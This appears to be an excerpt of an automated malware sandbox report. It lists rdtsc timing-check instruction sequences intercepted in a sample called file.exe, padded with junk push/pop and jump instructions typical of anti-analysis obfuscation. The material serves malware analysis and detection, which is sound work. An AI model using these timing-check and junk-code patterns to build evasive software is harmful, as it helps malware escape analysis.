                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920A7C second address: 920A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BCE second address: 920BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BD4 second address: 920BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4BB4C38h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BF5 second address: 920BFF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920BFF second address: 920C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92521C second address: 925220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E07 second address: 924E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94219B second address: 9421A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9421A2 second address: 9421A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9421A8 second address: 9421C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942006 second address: 94200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94200A second address: 942029 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jl 00007F43A4FCF696h 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942029 second address: 94202D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94202D second address: 942035 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943D03 second address: 943D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943D09 second address: 943D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CAD4 second address: 95CAE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F43A4BB4C2Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CC3D second address: 95CC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F43A4FCF6A7h 0x0000000b jns 00007F43A4FCF696h 0x00000011 jmp 00007F43A4FCF6A4h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CDF3 second address: 95CE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43A4BB4C2Eh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE07 second address: 95CE17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F43A4FCF696h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE17 second address: 95CE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CE1B second address: 95CE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F43A4FCF6A5h 0x0000000e pushad 0x0000000f jmp 00007F43A4FCF6A0h 0x00000014 jbe 00007F43A4FCF696h 0x0000001a push edx 0x0000001b pop edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f js 00007F43A4FCF69Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D19A second address: 95D19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D460 second address: 95D493 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F43A4FCF6A6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jns 00007F43A4FCF6A7h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D493 second address: 95D49D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4BB4C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D49D second address: 95D4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D723 second address: 95D727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9620FC second address: 962100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 962100 second address: 96210A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96358B second address: 963591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963591 second address: 963596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963596 second address: 96359B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96359B second address: 9635B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F43A4BB4C2Ah 0x0000000b popad 0x0000000c je 00007F43A4BB4C2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D5B second address: 4D50D61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D61 second address: 4D50D8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4BB4C37h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50D8B second address: 4D50DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA3 second address: 4D50DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F43A4BB4C33h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007F43A4BB4C39h 0x00000018 add ecx, 61E8FA86h 0x0000001e jmp 00007F43A4BB4C31h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DF6 second address: 4D50E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4FCF6A7h 0x00000009 and ecx, 451FD9BEh 0x0000000f jmp 00007F43A4FCF6A9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C2D second address: 4D40C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, cl 0x0000000d mov dx, 7F9Eh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F43A4BB4C34h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F43A4BB4C30h 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C7E second address: 4D40C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C82 second address: 4D40C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C86 second address: 4D40C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C8C second address: 4D40C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40C9B second address: 4D40CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop edi 0x0000000e jmp 00007F43A4FCF69Ah 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20100 second address: 4D20111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 movsx edi, ax 0x00000008 pop eax 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D20111 second address: 4D2012E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2012E second address: 4D2013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2013E second address: 4D201BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007F43A4FCF6A9h 0x00000015 sub ax, 1DC6h 0x0000001a jmp 00007F43A4FCF6A1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 mov al, 57h 0x00000026 call 00007F43A4FCF6A9h 0x0000002b pop ebx 0x0000002c popad 0x0000002d push dword ptr [ebp+04h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F43A4FCF6A9h 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D201BD second address: 4D201E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43A4BB4C2Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4061B second address: 4D4065B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F43A4FCF6A4h 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov dl, cl 0x00000014 mov cl, dh 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F43A4FCF6A2h 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4065B second address: 4D40661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40661 second address: 4D40666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40666 second address: 4D4066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4066C second address: 4D40670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40529 second address: 4D40540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C33h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40540 second address: 4D40544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4028C second address: 4D40290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40290 second address: 4D40296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40296 second address: 4D402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43A4BB4C30h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 movsx edi, ax 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 6F44h 0x00000020 movsx edi, cx 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50039 second address: 4D5003F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D5003F second address: 4D50043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50043 second address: 4D50071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d mov di, 9EC6h 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43A4FCF6A8h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F3E second address: 4D80FA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 95h 0x0000000d call 00007F43A4BB4C30h 0x00000012 pop ecx 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F43A4BB4C2Dh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov eax, 17F7FA73h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007F43A4BB4C36h 0x0000002a add cx, AD78h 0x0000002f jmp 00007F43A4BB4C2Bh 0x00000034 popfd 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60247 second address: 4D6025B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4FCF6A0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6025B second address: 4D6025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6025F second address: 4D602FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43A4FCF69Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ax, FAADh 0x00000014 pushfd 0x00000015 jmp 00007F43A4FCF69Ah 0x0000001a or ax, 1548h 0x0000001f jmp 00007F43A4FCF69Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 jmp 00007F43A4FCF6A6h 0x0000002d mov eax, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 mov ecx, 054839FDh 0x00000036 pushfd 0x00000037 jmp 00007F43A4FCF69Ah 0x0000003c xor eax, 3FE47AD8h 0x00000042 jmp 00007F43A4FCF69Bh 0x00000047 popfd 0x00000048 popad 0x00000049 and dword ptr [eax], 00000000h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov ebx, 63AB43C6h 0x00000054 call 00007F43A4FCF6A7h 0x00000059 pop esi 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D602FC second address: 4D60315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C35h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60315 second address: 4D60319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60319 second address: 4D6033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43A4BB4C38h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6033F second address: 4D60366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F43A4FCF6A5h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40452 second address: 4D40457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40457 second address: 4D4049F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1EB37E0Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007F43A4FCF69Dh 0x00000017 pop eax 0x00000018 pushfd 0x00000019 jmp 00007F43A4FCF6A1h 0x0000001e add ch, FFFFFFA6h 0x00000021 jmp 00007F43A4FCF6A1h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40091 second address: 4D40095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40095 second address: 4D400B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400B2 second address: 4D400B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400B8 second address: 4D400BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400BC second address: 4D400D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F43A4FCF6A2h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D400D9 second address: 4D400EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C2Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C4F second address: 4DA0CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F43A4FCF6A0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43A4FCF6A1h 0x00000017 add ch, 00000066h 0x0000001a jmp 00007F43A4FCF6A1h 0x0000001f popfd 0x00000020 mov dl, cl 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 jmp 00007F43A4FCF6A9h 0x0000002a pushfd 0x0000002b jmp 00007F43A4FCF6A0h 0x00000030 or esi, 1B284868h 0x00000036 jmp 00007F43A4FCF69Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov dh, 57h 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CED second address: 4DA0D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43A4BB4C39h 0x00000009 sbb al, 00000036h 0x0000000c jmp 00007F43A4BB4C31h 0x00000011 popfd 0x00000012 mov dh, cl 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+0Ch] 0x0000001a jmp 00007F43A4BB4C33h 0x0000001f push dword ptr [ebp+08h] 0x00000022 jmp 00007F43A4BB4C36h 0x00000027 call 00007F43A4BB4C29h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F43A4BB4C2Eh 0x00000033 and eax, 03BBB1E8h 0x00000039 jmp 00007F43A4BB4C2Bh 0x0000003e popfd 0x0000003f mov si, 75DFh 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F43A4BB4C37h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0D9F second address: 4DA0DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0DA3 second address: 4DA0DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0DA9 second address: 4DA0E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04639651h 0x00000008 mov edi, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 call 00007F43A4FCF6A9h 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007F43A4FCF69Ch 0x0000001e xor esi, 0A8D7908h 0x00000024 jmp 00007F43A4FCF69Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F43A4FCF6A4h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0E0D second address: 4DA0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
